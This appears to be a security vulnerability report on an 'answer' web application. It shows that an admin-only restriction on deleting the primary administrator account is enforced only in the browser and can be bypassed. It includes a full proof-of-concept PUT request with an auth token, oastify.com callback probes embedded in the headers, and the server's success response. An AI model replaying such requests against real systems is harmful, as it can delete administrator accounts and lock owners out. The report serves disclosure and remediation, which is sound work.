Description

The application enforces account deletion on the client-side with a popup that states the admin account cannot be deleted. Additionally, regular users do not have an option in the interface to delete their own account.

An administrative and regular-privileged user are able to bypass this restriction by intercepting the request and executing it through Burp Repeater. See screenshot evidence of this vulnerability here - https://www.notion.so/themayor/Insecure-Business-Logic-Client-Side-Enforcement-Bypass-on-Admin-Deletion-f814c7e5619542fca3ad6299742c4fdc?pvs=4

Proof of Concept

PUT /answer/admin/api/user/status HTTP/1.1
Host: 192.168.1.66:9080
Content-Length: 46
Accept-Language: en_US
Authorization: 205834a8-b25a-11ed-99de-0242ac110002
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@mkaebgzpeo8uptteqrg2263p5gb8e1gp5.oastify.com
Content-Type: application/json
Accept: */*
Origin: http://192.168.1.66:9080
Referer: http://1xztovc4r3l9286t36thflg4ivonrgv4k.oastify.com/ref
Accept-Encoding: gzip, deflate
Connection: close
Cache-Control: no-transform

{
   "user_id":"1",
   "status":"deleted"
}

Response

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Date: Wed, 22 Feb 2023 02:51:43 GMT
Content-Length: 65
Connection: close

{"code":200,"reason":"base.success","msg":"Success.","data":null}

Impact

The utilization of client-side enforcement of user actions allows for users to modify requests in transit from the browser to the server. In the case of this vulnerability, the deletion of an account by a user appears to be against the logic of the application as the primary admin is restricted, and a regular user is not given the option to do so.

Deletion of the primary administrator account restricts complete access to the control of the application if no other administrative account is created and present.